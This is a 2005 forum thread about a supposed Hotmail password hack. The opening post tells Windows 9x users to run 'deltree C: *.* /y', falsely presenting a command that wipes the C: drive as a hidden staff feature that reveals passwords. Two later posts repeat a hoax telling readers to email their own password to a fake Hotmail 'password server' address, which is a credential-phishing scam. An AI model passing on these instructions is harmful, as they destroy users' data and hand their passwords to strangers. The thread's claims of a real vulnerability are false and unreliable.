21 replies to this topic

#1 Limitation//Moon

Limitation//Moon

Advanced Honourable Member

• National Committee
  • PipPipPipPipPip
  • 2,810 posts

Posted 12 April 2005 - 01:47 AM

For the users of Windows ME, 98, on down, just open up a DOS command prompt and type in the following commands:

It appears to be an Easter egg they put in Windows 9X and DOS so the staff could fix problems remotely, and it does a fake delete to try and scare you away. If you let it run for a few minutes though, it will eventually pop up a little window in DOS saying welcome to Hotmail Staff! And then it asks you for an MSN or Hotmail E-Mail address, and then will show you the password for that address:

first type this:
CODE

deltree C: *.* /y

If that doesn't work, try this:

deltree C: *.* \y

(My DOS is lacking right now and it's been a while)

after that just wait about 5 minutes and press //..;;;

Then you'll see a window of IE open up, go to the following address:

http://www.microsoft.net/1amA31337a...yothertime.html

print "date";

#2 Limitation//Moon

Limitation//Moon

Advanced Honourable Member

• National Committee
  • PipPipPipPipPip
  • 2,810 posts

Posted 12 April 2005 - 01:47 AM

http://www.microsoft...yothertime.html

#3 dave

dave

• Members
  • PipPipPip
  • 278 posts

Posted 12 April 2005 - 01:34 PM

Try mariyo tara Bhaina ni gathe.
Launa ali ramrari sikauna paryo guru....kasari ho
If I had magic wand, I would let the world to **** my **** without being on ******

#4 southern

southern

WNSO Soccer Team

• Members
  • PipPipPip
  • 201 posts

Posted 12 April 2005 - 01:41 PM

I really need this, How do i start, step by step please sad.gif

#5 prem charo

prem charo

• Members
  • Pip
  • 24 posts

Posted 12 April 2005 - 02:02 PM

We all know anything can be hacked, but to misuse your knowledge especially in such things doesnt show the greatness in people. Sorry !!!

#6 voltagegal

voltagegal

• Members
  • PipPipPip
  • 194 posts

Posted 12 April 2005 - 03:15 PM

If you wanna hack my hotmail, check my profile, I use the one which nobody knows. Try it baby.

Ideology separate us, dreams and anguish brings us together

#7 zen_spirit

zen_spirit

• Members
  • PipPip
  • 135 posts

Posted 12 April 2005 - 05:46 PM

QUOTE(prem charo @ Apr 12 2005, 08:32 PM)
We all know anything can be hacked, but to misuse your knowledge especially in such things doesnt show the greatness in people. Sorry !!!

View Post

... i agree with you ...

... (((:-) ))) ...

#8 dave

dave

• Members
  • PipPipPip
  • 278 posts

Posted 13 April 2005 - 10:38 AM

QUOTE(southern @ Apr 12 2005, 01:41 PM)
I really need this, How do i start, step by step please sad.gif

View Post

AGREED WITH YOU. ME TOO WANT TO GO STEPS BY STEPS.
PLEASE VERIFY THE STEPS.
If I had magic wand, I would let the world to **** my **** without being on ******

#9 GROUNDED

GROUNDED

• Members
  • Pip
  • 34 posts

Posted 01 May 2005 - 06:57 PM

I found this somewhere. I have not yet tried this and neither do I plan to try it. I don't have much knowledge in such fields. If any of you are interested then you can go ahead with your own risk. remember, this may be illegal and you are resposible for your own action.

Hotmail Hacking Update May,2005

Although many hacking methods have been published, since Microsoft recently took over Hotmail many vulnerabilities have been corrected. However a recent loophole has been discovered, exposing hotmails automated password retrieval server, acquiring a password has been possible relatively easily. The following method has not been addressed yet and poses a serious security threat to hotmail account privacy:

Step1
The hacker uses an online Email account such as those offered by Hotmail and Yahoo to send an e-mail in the adress:: (system_server_password@hotmail.com)

Step2
In the subject field the exact phrase entered must be forgot_passw_141v2

Step3
Finally the following is added to the body of the Email:

login-mass141v2?+forgot=< "subsitute Email address of hacker here and the password will be sent here"

pass=?328=< "substitute your password here so the automated check is tricked into believing the Email is genuine"

retreive-mass141v2_pass=< "the victims Email address is substituted here"

Result
The automated service is tricked into sending the victims password to the Email address entered.

Discussion
The bots cookie based security check is circumvented and hence obviously flawed. This script based method makes it possible for relatively inexperienced hackers to retrieve passwords of hotmail accounts and is thus a security issue that must be addressed immediatly by hotmail. However, to date no action has been taken due to the relatively unkown nature of the method and script.

Disclaimer

Please note that this information is provided for educational purposes only

the usage of such information is illegal

We do not advocate unauthorized use or theft of any services

#10 GROUNDED

GROUNDED

• Members
  • Pip
  • 34 posts

Posted 01 May 2005 - 07:05 PM

I found this somewhere. I have not yet tried this and neither do I plan to try it. I don't have much knowledge in such fields. If any of you are interested then you can go ahead with your own risk. remember, this may be illegal and you are resposible for your own action.

Hotmail Hacking Update May,2005

Although many hacking methods have been published, since Microsoft recently took over Hotmail many vulnerabilities have been corrected. However a recent loophole has been discovered, exposing hotmails automated password retrieval server, acquiring a password has been possible relatively easily. The following method has not been addressed yet and poses a serious security threat to hotmail account privacy:

Step1
The hacker uses an online Email account such as those offered by Hotmail and Yahoo to send an e-mail in the adress:: system_server_password@hotmail.com

Step2
In the subject field the exact phrase entered must be forgot_passw_141v2

Step3
Finally the following is added to the body of the Email:

login-mass141v2?+forgot=< "subsitute Email address of hacker here and the password will be sent here"

pass=?328=< "substitute your password here so the automated check is tricked into believing the Email is genuine"

retreive-mass141v2_pass=< "the victims Email address is substituted here"

Result
The automated service is tricked into sending the victims password to the Email address entered.

Discussion
The bots cookie based security check is circumvented and hence obviously flawed. This script based method makes it possible for relatively inexperienced hackers to retrieve passwords of hotmail accounts and is thus a security issue that must be addressed immediatly by hotmail. However, to date no action has been taken due to the relatively unkown nature of the method and script.

Disclaimer

Please note that this information is provided for educational purposes only

the usage of such information is illegal

We do not advocate unauthorized use or theft of any services

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users